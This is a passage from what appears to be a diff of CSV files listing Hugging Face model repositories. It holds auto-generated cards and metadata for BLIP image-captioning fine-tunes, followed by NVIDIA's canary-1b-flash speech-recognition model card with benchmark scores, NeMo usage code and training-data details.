lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 469732924}, ""total"": 469732924}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-04-07 15:05:09+00:00"", ""cardData"": ""base_model: 
Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-finetuned-gradcam\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""67f3e1a0f1a201ce2c9be85c"", ""modelId"": ""saakshigupta/blip-finetuned-gradcam"", ""usedStorage"": 10763569504}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=saakshigupta/blip-finetuned-gradcam&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bsaakshigupta%2Fblip-finetuned-gradcam%5D(%2Fsaakshigupta%2Fblip-finetuned-gradcam)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
saakshigupta/blip-finetuned-gradcam-optimized,"---
library_name: transformers
license: bsd-3-clause
base_model: Salesforce/blip-image-captioning-large
tags:
- generated_from_trainer
model-index:
- name: blip-finetuned-gradcam-optimized
  results: []
---

<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->

# blip-finetuned-gradcam-optimized

This model is a fine-tuned version of [Salesforce/blip-image-captioning-large](https://huggingface.co/Salesforce/blip-image-captioning-large) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 6.6748

## Model description

More information needed

## Intended uses & limitations

More information needed

## Training and evaluation data

More information needed

## Training procedure

### Training hyperparameters

The following hyperparameters were used during training:
- learning_rate: 2e-06
- train_batch_size: 2
- eval_batch_size: 2
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 8
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 50
- num_epochs: 15
- mixed_precision_training: Native AMP

### Training results

| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-------:|:----:|:---------------:|
| 9.8985 | 0.4444 | 10 | 9.8608 |
| 9.7965 | 0.8889 | 20 | 9.7389 |
| 9.7009 | 1.3111 | 30 | 9.6374 |
| 9.539 | 1.7556 | 40 | 9.5101 |
| 8.2904 | 2.1778 | 50 | 9.1547 |
| 8.7882 | 2.6222 | 60 | 8.7516 |
| 7.6249 | 3.0444 | 70 | 8.4009 |
| 8.2185 | 3.4889 | 80 | 8.1483 |
| 8.0129 | 3.9333 | 90 | 7.9948 |
| 7.8556 | 4.3556 | 100 | 7.8385 |
| 7.7265 | 4.8 | 110 | 7.6990 |
| 7.6183 | 5.2222 | 120 | 7.5757 |
| 7.5 | 5.6667 | 130 | 7.4770 |
| 6.6711 | 6.0889 | 140 | 7.3812 |
| 7.3249 | 6.5333 | 150 | 7.3007 |
| 7.2369 | 6.9778 | 160 | 7.2224 |
| 7.1824 | 7.4 | 170 | 7.1548 |
| 7.1173 | 7.8444 | 180 | 7.0876 |
| 7.0568 | 8.2667 | 190 | 7.0291 |
| 7.0033 | 8.7111 | 200 | 6.9772 |
| 6.2525 | 9.1333 | 210 | 6.9274 |
| 6.9084 | 9.5778 | 220 | 6.8845 |
| 6.1803 | 10.0 | 230 | 6.8465 |
| 6.8372 | 10.4444 | 240 | 6.8137 |
| 6.807 | 10.8889 | 250 | 6.7842 |
| 6.7844 | 11.3111 | 260 | 6.7578 |
| 6.7499 | 11.7556 | 270 | 6.7369 |
| 6.0823 | 12.1778 | 280 | 6.7185 |
| 6.7188 | 12.6222 | 290 | 6.7038 |
| 6.036 | 13.0444 | 300 | 6.6918 |
| 6.7017 | 13.4889 | 310 | 6.6834 |
| 6.7003 | 13.9333 | 320 | 6.6776 |
| 6.6899 | 14.3556 | 330 | 6.6748 |

### Framework versions

- Transformers 4.50.3
- Pytorch 2.6.0+cu124
- Datasets 3.5.0
- Tokenizers 0.21.1
","{""id"": ""saakshigupta/blip-finetuned-gradcam-optimized"", ""author"": ""saakshigupta"", ""sha"": ""9a54e8cca6d94e2ed72bce2a6cfae8b6dab753c7"", ""last_modified"": ""2025-04-07 15:44:03+00:00"", ""created_at"": ""2025-04-07 15:23:48+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 14, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""blip"", ""image-text-to-text"", ""generated_from_trainer"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""license:bsd-3-clause"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-finetuned-gradcam-optimized\n results: []"", ""widget_data"": null, ""model_index"": [{""name"": ""blip-finetuned-gradcam-optimized"", ""results"": []}], ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip"", ""tokenizer_config"": {""cls_token"": ""[CLS]"", ""mask_token"": ""[MASK]"", ""pad_token"": ""[PAD]"", ""sep_token"": ""[SEP]"", ""unk_token"": ""[UNK]""}}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/vocab.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 469732924}, ""total"": 469732924}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-04-07 15:44:03+00:00"", 
""cardData"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-finetuned-gradcam-optimized\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""67f3ee041738ef74e69a49d4"", ""modelId"": ""saakshigupta/blip-finetuned-gradcam-optimized"", ""usedStorage"": 18790110168}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=saakshigupta/blip-finetuned-gradcam-optimized&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bsaakshigupta%2Fblip-finetuned-gradcam-optimized%5D(%2Fsaakshigupta%2Fblip-finetuned-gradcam-optimized)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
saakshigupta/deepfake-blip-large,"---
library_name: transformers
license: bsd-3-clause
base_model: Salesforce/blip-image-captioning-large
tags:
- generated_from_trainer
model-index:
- name: deepfake-blip-large
  results: []
---

<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->

# deepfake-blip-large

This model is a fine-tuned version of [Salesforce/blip-image-captioning-large](https://huggingface.co/Salesforce/blip-image-captioning-large) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.0467

## Model description

More information needed

## Intended uses & limitations

More information needed

## Training and evaluation data

More information needed

## Training procedure

### Training hyperparameters

The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- num_epochs: 5
- mixed_precision_training: Native AMP

### Training results

| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:----:|:---------------:|
| 7.7789 | 1.0 | 42 | 7.1881 |
| 4.5699 | 2.0 | 84 | 3.6060 |
| 0.6286 | 3.0 | 126 | 0.2297 |
| 0.0928 | 4.0 | 168 | 0.0572 |
| 0.0492 | 5.0 | 210 | 0.0467 |

### Framework versions

- Transformers 4.50.3
- Pytorch 2.6.0+cu124
- Datasets 3.5.0
- Tokenizers 0.21.1
","{""id"": ""saakshigupta/deepfake-blip-large"", ""author"": ""saakshigupta"", ""sha"": ""4670858e16b553f499112000a2cbaa161abb6bad"", ""last_modified"": ""2025-04-09 17:08:46+00:00"", ""created_at"": ""2025-04-09 16:35:46+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 100, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""blip"", ""image-text-to-text"", ""generated_from_trainer"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""license:bsd-3-clause"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: deepfake-blip-large\n results: []"", ""widget_data"": null, ""model_index"": [{""name"": ""deepfake-blip-large"", ""results"": []}], ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip"", ""tokenizer_config"": {""cls_token"": ""[CLS]"", ""mask_token"": ""[MASK]"", ""pad_token"": ""[PAD]"", ""sep_token"": ""[SEP]"", ""unk_token"": ""[UNK]""}}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [""deepfakedetection/deepfake_uq""], ""safetensors"": {""parameters"": {""F32"": 469732924}, ""total"": 469732924}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-04-09 17:08:46+00:00"", ""cardData"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: deepfake-blip-large\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""67f6a1e2e75587812f86583c"", ""modelId"": ""saakshigupta/deepfake-blip-large"", ""usedStorage"": 5637036744}",1,,0,,0,,0,,0,"deepfakedetection/deepfake_uq, 
huggingface/InferenceSupport/discussions/new?title=saakshigupta/deepfake-blip-large&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bsaakshigupta%2Fdeepfake-blip-large%5D(%2Fsaakshigupta%2Fdeepfake-blip-large)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A",2
bloom_finetunes_20250422_180448.csv
ADDED
The diff for this file is too large to render. See raw diff

canary-1b-flash_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv
ADDED
@@ -0,0 +1,641 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
nvidia/canary-1b-flash,"---
license: cc-by-4.0
language:
- en
- de
- es
- fr
library_name: nemo
datasets:
- librispeech_asr
- fisher_corpus
- Switchboard-1
- WSJ-0
- WSJ-1
- National-Singapore-Corpus-Part-1
- National-Singapore-Corpus-Part-6
- vctk
- voxpopuli
- europarl
- multilingual_librispeech
- mozilla-foundation/common_voice_8_0
- MLCommons/peoples_speech
thumbnail: null
tags:
- automatic-speech-recognition
- automatic-speech-translation
- speech
- audio
- Transformer
- FastConformer
- Conformer
- pytorch
- NeMo
- hf-asr-leaderboard
widget:
- example_title: Librispeech sample 1
  src: https://cdn-media.huggingface.co/speech_samples/sample1.flac
- example_title: Librispeech sample 2
  src: https://cdn-media.huggingface.co/speech_samples/sample2.flac
model-index:
- name: canary-1b-flash
  results:
  - task:
      name: Automatic Speech Recognition
      type: automatic-speech-recognition
    dataset:
      name: LibriSpeech (other)
      type: librispeech_asr
      config: other
      split: test
      args:
        language: en
    metrics:
    - name: Test WER
      type: wer
      value: 2.87
  - task:
      type: Automatic Speech Recognition
      name: automatic-speech-recognition
    dataset:
      name: SPGI Speech
      type: kensho/spgispeech
      config: test
      split: test
      args:
        language: en
    metrics:
    - name: Test WER
      type: wer
      value: 1.95
  - task:
      type: Automatic Speech Recognition
      name: automatic-speech-recognition
    dataset:
      name: Mozilla Common Voice 16.1
      type: mozilla-foundation/common_voice_16_1
      config: en
      split: test
      args:
        language: en
    metrics:
    - name: Test WER (En)
      type: wer
      value: 6.99
  - task:
      type: Automatic Speech Recognition
      name: automatic-speech-recognition
    dataset:
      name: Mozilla Common Voice 16.1
      type: mozilla-foundation/common_voice_16_1
      config: de
      split: test
      args:
        language: de
    metrics:
    - name: Test WER (De)
      type: wer
      value: 4.09
  - task:
      type: Automatic Speech Recognition
      name: automatic-speech-recognition
    dataset:
      name: Mozilla Common Voice 16.1
      type: mozilla-foundation/common_voice_16_1
      config: es
      split: test
      args:
        language: es
    metrics:
    - name: Test WER (ES)
      type: wer
      value: 3.62
  - task:
      type: Automatic Speech Recognition
      name: automatic-speech-recognition
    dataset:
      name: Mozilla Common Voice 16.1
      type: mozilla-foundation/common_voice_16_1
      config: fr
      split: test
      args:
        language: fr
    metrics:
    - name: Test WER (Fr)
      type: wer
      value: 6.15
  - task:
      type: Automatic Speech Translation
      name: automatic-speech-translation
    dataset:
      name: FLEURS
      type: google/fleurs
      config: en_us
      split: test
      args:
        language: en-de
    metrics:
    - name: Test BLEU (En->De)
      type: bleu
      value: 32.27
  - task:
      type: Automatic Speech Translation
      name: automatic-speech-translation
    dataset:
      name: FLEURS
      type: google/fleurs
      config: en_us
      split: test
      args:
        language: en-de
    metrics:
    - name: Test BLEU (En->Es)
      type: bleu
      value: 22.6
  - task:
      type: Automatic Speech Translation
      name: automatic-speech-translation
    dataset:
      name: FLEURS
      type: google/fleurs
      config: en_us
      split: test
      args:
        language: en-de
    metrics:
    - name: Test BLEU (En->Fr)
      type: bleu
      value: 41.22
  - task:
      type: Automatic Speech Translation
      name: automatic-speech-translation
    dataset:
      name: FLEURS
      type: google/fleurs
      config: de_de
      split: test
      args:
        language: de-en
    metrics:
    - name: Test BLEU (De->En)
      type: bleu
      value: 35.5
  - task:
      type: Automatic Speech Translation
      name: automatic-speech-translation
    dataset:
      name: FLEURS
      type: google/fleurs
      config: es_419
      split: test
      args:
        language: es-en
    metrics:
    - name: Test BLEU (Es->En)
      type: bleu
      value: 23.32
  - task:
      type: Automatic Speech Translation
      name: automatic-speech-translation
    dataset:
      name: FLEURS
      type: google/fleurs
      config: fr_fr
      split: test
      args:
        language: fr-en
    metrics:
    - name: Test BLEU (Fr->En)
      type: bleu
      value: 33.42
  - task:
      type: Automatic Speech Translation
      name: automatic-speech-translation
    dataset:
      name: COVOST
      type: covost2
      config: de_de
      split: test
      args:
        language: de-en
    metrics:
    - name: Test BLEU (De->En)
      type: bleu
      value: 39.33
  - task:
      type: Automatic Speech Translation
      name: automatic-speech-translation
    dataset:
      name: COVOST
      type: covost2
      config: es_419
      split: test
      args:
        language: es-en
    metrics:
    - name: Test BLEU (Es->En)
      type: bleu
      value: 41.86
  - task:
      type: Automatic Speech Translation
      name: automatic-speech-translation
    dataset:
      name: COVOST
      type: covost2
      config: fr_fr
      split: test
      args:
        language: fr-en
    metrics:
    - name: Test BLEU (Fr->En)
      type: bleu
      value: 41.43
metrics:
- wer
- bleu
- comet
pipeline_tag: automatic-speech-recognition
---

# Canary 1B Flash

<style>
img {
  display: inline;
}
</style>

## Description:
NVIDIA NeMo Canary Flash [1] is a family of multilingual multi-tasking models based on the Canary architecture [2] that achieve state-of-the-art performance on multiple speech benchmarks. With 883 million parameters and an inference speed of more than 1000 RTFx (on open-asr-leaderboard datasets), canary-1b-flash supports automatic speech-to-text recognition (ASR) in four languages (English, German, French, Spanish) and translation from English to German/French/Spanish and from German/French/Spanish to English, with or without punctuation and capitalization (PnC). Additionally, canary-1b-flash offers an experimental feature for word-level and segment-level timestamps in English, German, French, and Spanish.
This model is released under the permissive CC-BY-4.0 license and is available for commercial use.

## Model Architecture:
Canary is an encoder-decoder model with a FastConformer [3] Encoder and a Transformer Decoder [4]. With audio features extracted from the encoder, task tokens such as \<target language\>, \<task\>, \<toggle timestamps\> and \<toggle PnC\> are fed into the Transformer Decoder to trigger the text generation process. Canary uses a concatenated tokenizer [5] built from individual SentencePiece [6] tokenizers for each language, which makes it easy to scale up to more languages. The canary-1b-flash model has 32 encoder layers and 4 decoder layers, for a total of 883M parameters. For more details about the architecture, please refer to [1].

## NVIDIA NeMo

To train, fine-tune or transcribe with canary-1b-flash, you will need to install [NVIDIA NeMo](https://github.com/NVIDIA/NeMo).

## How to Use this Model

The model is available for use in the NeMo Framework [7], and can be used as a pre-trained checkpoint for inference or for fine-tuning on another dataset.

Please refer to [our tutorial](https://github.com/NVIDIA/NeMo/blob/main/tutorials/asr/Canary_Multitask_Speech_Model.ipynb) for more details.

A few inference examples are listed below:

### Loading the Model

```python
from nemo.collections.asr.models import EncDecMultiTaskModel

# load model
canary_model = EncDecMultiTaskModel.from_pretrained('nvidia/canary-1b-flash')

# update decode params
decode_cfg = canary_model.cfg.decoding
decode_cfg.beam.beam_size = 1
canary_model.change_decoding_strategy(decode_cfg)
```

## Input:
**Input Type(s):** Audio <br>
**Input Format(s):** .wav or .flac files <br>
**Input Parameter(s):** 1D <br>
**Other Properties Related to Input:** 16000 Hz Mono-channel Audio, Pre-Processing Not Needed <br>

Input to canary-1b-flash can be either a list of paths to audio files or a jsonl manifest file.

If the input is a list of paths, canary-1b-flash assumes the audio is English and transcribes it; i.e., English ASR is canary-1b-flash's default behavior.
```python
output = canary_model.transcribe(
    ['path1.wav', 'path2.wav'],
    batch_size=16,  # batch size to run the inference with
    pnc='yes',  # generate output with Punctuation and Capitalization
)

predicted_text_1 = output[0].text
```

canary-1b-flash can also generate word- and segment-level timestamps:
```python
output = canary_model.transcribe(
    ['filepath.wav'],
    timestamps='yes',  # generate output with timestamps
)

predicted_text = output[0].text
word_level_timestamps = output[0].timestamp['word']
segment_level_timestamps = output[0].timestamp['segment']
```
For audio files longer than 10 seconds, we recommend using the longform inference script (explained in the next section) with `chunk_len_in_secs=10.0` to generate timestamps.

To use canary-1b-flash to transcribe other supported languages, perform speech-to-text translation, or produce word-level timestamps, specify the input as a jsonl manifest file, where each line in the file is a dictionary containing the following fields:

```yaml
# Example of a line in input_manifest.json
{
    ""audio_filepath"": ""/path/to/audio.wav"",  # path to the audio file
    ""source_lang"": ""en"",  # language of the audio input, set `source_lang`==`target_lang` for ASR, choices=['en','de','es','fr']
    ""target_lang"": ""en"",  # language of the text output, choices=['en','de','es','fr']
    ""pnc"": ""yes"",  # whether to have PnC output, choices=['yes', 'no']
    ""timestamp"": ""yes"",  # whether to output word-level timestamps, choices=['yes', 'no']
}
```

and then use:
```python
output = canary_model.transcribe(
    ""<path to input manifest file>"",
    batch_size=16,  # batch size to run the inference with
)
```
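Since the manifest is plain jsonl (one JSON object per line), it is easy to generate programmatically. A minimal sketch (not from the original card), assuming `canary_model` was loaded as above, that writes a one-line manifest requesting German-to-English speech translation:

```python
import json

# Hypothetical example: request De->En speech translation for one file.
record = {
    'audio_filepath': '/path/to/audio.wav',  # placeholder path
    'source_lang': 'de',
    'target_lang': 'en',  # source_lang != target_lang -> translation
    'pnc': 'yes',
    'timestamp': 'no',
}

with open('input_manifest.json', 'w') as f:
    f.write(json.dumps(record) + '\n')  # jsonl: one object per line

output = canary_model.transcribe('input_manifest.json', batch_size=16)
print(output[0].text)
```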
|
| 356 |
+
|
| 357 |
+
### Longform inference with Canary-1B-flash:
|
| 358 |
+
Canary models are designed to handle input audio smaller than 40 seconds. In order to handle longer audios, NeMo includes [speech_to_text_aed_chunked_infer.py](https://github.com/NVIDIA/NeMo/blob/main/examples/asr/asr_chunked_inference/aed/speech_to_text_aed_chunked_infer.py) script that handles chunking, performs inference on the chunked files, and stitches the transcripts.
|
| 359 |
+
|
| 360 |
+
The script will perform inference on all `.wav` files in `audio_dir`. Alternatively, you can pass a path to a manifest file as shown above. The decoded output will be saved at `output_json_path`.
|
| 361 |
+
|
| 362 |
+
```bash
|
| 363 |
+
python scripts/speech_to_text_aed_chunked_infer.py \
|
| 364 |
+
pretrained_name=""nvidia/canary-1b-flash"" \
|
| 365 |
+
audio_dir=$audio_dir \
|
| 366 |
+
output_filename=$output_json_path \
|
| 367 |
+
chunk_len_in_secs=40.0 \
|
| 368 |
+
batch_size=1 \
|
| 369 |
+
decoding.beam.beam_size=1 \
|
| 370 |
+
timestamps=False
|
| 371 |
+
```
|
| 372 |
+
|
| 373 |
+
**Note** that for longform inference with timestamps, it is recommended to use `chunk_len_in_secs` of 10 seconds.
|
| 374 |
+
|
| 375 |
+
|
| 376 |
+
## Output:
|
| 377 |
+
**Output Type(s):** Text <br>
|
| 378 |
+
**Output Format:** Text output as a string (with optional timestamps), depending on the task chosen for decoding <br>
|
| 379 |
+
**Output Parameters:** 1-Dimensional text string <br>
|
| 380 |
+
**Other Properties Related to Output:** May Need Inverse Text Normalization; Does Not Handle Special Characters <br>
|
| 381 |
+
|
| 382 |
+
|
| 383 |
+
## Software Integration:
|
| 384 |
+
**Runtime Engine(s):**
|
| 385 |
+
* NeMo - main <br>
|
| 386 |
+
|
| 387 |
+
**Supported Hardware Microarchitecture Compatibility:** <br>
|
| 388 |
+
* [NVIDIA Ampere] <br>
|
| 389 |
+
* [NVIDIA Blackwell] <br>
|
| 390 |
+
* [NVIDIA Jetson] <br>
|
| 391 |
+
* [NVIDIA Hopper] <br>
|
| 392 |
+
* [NVIDIA Lovelace] <br>
|
| 393 |
+
* [NVIDIA Pascal] <br>
|
| 394 |
+
* [NVIDIA Turing] <br>
|
| 395 |
+
* [NVIDIA Volta] <br>
|
| 396 |
+
|
| 397 |
+
**[Preferred/Supported] Operating System(s):** <br>
|
| 398 |
+
* [Linux] <br>
|
| 399 |
+
* [Linux 4 Tegra] <br>
|
| 400 |
+
* [Windows] <br>
|
| 401 |
+
|
| 402 |
+
## Model Version(s):
|
| 403 |
+
canary-1b-flash <br>
|
| 404 |
+
|
| 405 |
+
|
| 406 |
+
# Training and Evaluation Datasets:
|
| 407 |
+
|
| 408 |
+
## Training Dataset:
|
| 409 |
+
|
| 410 |
+
The canary-1b-flash model is trained on a total of 85K hrs of speech data. It consists of 31K hrs of public data, 20K hrs collected by [Suno](https://suno.ai/), and 34K hrs of in-house data.
|
| 411 |
+
The datasets below include conversations, videos from the web and audiobook recordings.
|
| 412 |
+
|
| 413 |
+
**Data Collection Method:**
|
| 414 |
+
* Human <br>
|
| 415 |
+
|
| 416 |
+
**Labeling Method:**
|
| 417 |
+
* Hybrid: Human, Automated <br>
|
| 418 |
+
|
| 419 |
+
The constituents of public data are as follows.
|
| 420 |
+
|
| 421 |
+
#### English (25.5k hours)
|
| 422 |
+
- Librispeech 960 hours
|
| 423 |
+
- Fisher Corpus
|
| 424 |
+
- Switchboard-1 Dataset
|
| 425 |
+
- WSJ-0 and WSJ-1
|
| 426 |
+
- National Speech Corpus (Part 1, Part 6)
|
| 427 |
+
- VCTK
|
| 428 |
+
- VoxPopuli (EN)
|
| 429 |
+
- Europarl-ASR (EN)
|
| 430 |
+
- Multilingual Librispeech (MLS EN) - 2,000 hour subset
|
| 431 |
+
- Mozilla Common Voice (v7.0)
|
| 432 |
+
- People's Speech - 12,000 hour subset
|
| 433 |
+
- Mozilla Common Voice (v11.0) - 1,474 hour subset
|
| 434 |
+
|
| 435 |
+
#### German (2.5k hours)
|
| 436 |
+
- Mozilla Common Voice (v12.0) - 800 hour subset
|
| 437 |
+
- Multilingual Librispeech (MLS DE) - 1,500 hour subset
|
| 438 |
+
- VoxPopuli (DE) - 200 hr subset
|
| 439 |
+
|
| 440 |
+
#### Spanish (1.4k hours)
|
| 441 |
+
- Mozilla Common Voice (v12.0) - 395 hour subset
|
| 442 |
+
- Multilingual Librispeech (MLS ES) - 780 hour subset
|
| 443 |
+
- VoxPopuli (ES) - 108 hour subset
|
| 444 |
+
- Fisher - 141 hour subset
|
| 445 |
+
|
| 446 |
+
#### French (1.8k hours)
|
| 447 |
+
- Mozilla Common Voice (v12.0) - 708 hour subset
|
| 448 |
+
- Multilingual Librispeech (MLS FR) - 926 hour subset
|
| 449 |
+
- VoxPopuli (FR) - 165 hour subset
|
| 450 |
+
|
| 451 |
+
|
| 452 |
+
## Evaluation Dataset:
|
| 453 |
+
|
| 454 |
+
**Data Collection Method:** <br>
|
| 455 |
+
* Human <br>
|
| 456 |
+
|
| 457 |
+
**Labeling Method:** <br>
|
| 458 |
+
* Human <br>
|
| 459 |
+
|
| 460 |
+
Automatic Speech Recognition:
|
| 461 |
+
* [HuggingFace OpenASR Leaderboard evaluation sets](https://huggingface.co/spaces/hf-audio/open_asr_leaderboard)
|
| 462 |
+
* [MLS](https://huggingface.co/datasets/facebook/multilingual_librispeech)
|
| 463 |
+
* [MCV](https://commonvoice.mozilla.org/en/datasets)
|
| 464 |
+
|
| 465 |
+
Automatic Speech Translation:
|
| 466 |
+
* [FLEURS](https://huggingface.co/datasets/google/fleurs)
|
| 467 |
+
* [COVOST-v2](https://github.com/facebookresearch/covost)
|
| 468 |
+
* [mExpresso](https://huggingface.co/facebook/seamless-expressive#mexpresso-multilingual-expresso)
|
| 469 |
+
|
| 470 |
+
Timestamp Prediction:
|
| 471 |
+
* [Librispeech](https://www.openslr.org/12)
|
| 472 |
+
|
| 473 |
+
Hallucination Robustness:
|
| 474 |
+
* [MUSAN](https://www.openslr.org/17/) 48 hrs eval set
|
| 475 |
+
|
| 476 |
+
Noise Robustness:
|
| 477 |
+
* [Librispeech](https://www.openslr.org/12)
|
| 478 |
+
|
| 479 |
+
Model Fairness:
|
| 480 |
+
* [Casual Conversations Dataset](https://arxiv.org/abs/2104.02821)
|
| 481 |
+
|
| 482 |
+
## Training
|
| 483 |
+
|
| 484 |
+
Canary-1B-Flash is trained using the NVIDIA NeMo Framework [7] for a total of 200K steps with 2D bucketing [1] and optimal batch sizes set using OOMptimizer [8]. The model is trained on 128 NVIDIA A100 80GB GPUs.
|
| 485 |
+
The model can be trained using this [example script](https://github.com/NVIDIA/NeMo/blob/main/examples/asr/speech_multitask/speech_to_text_aed.py) and [base config](https://github.com/NVIDIA/NeMo/blob/main/examples/asr/conf/speech_multitask/fast-conformer_aed.yaml).
|
| 486 |
+
|
| 487 |
+
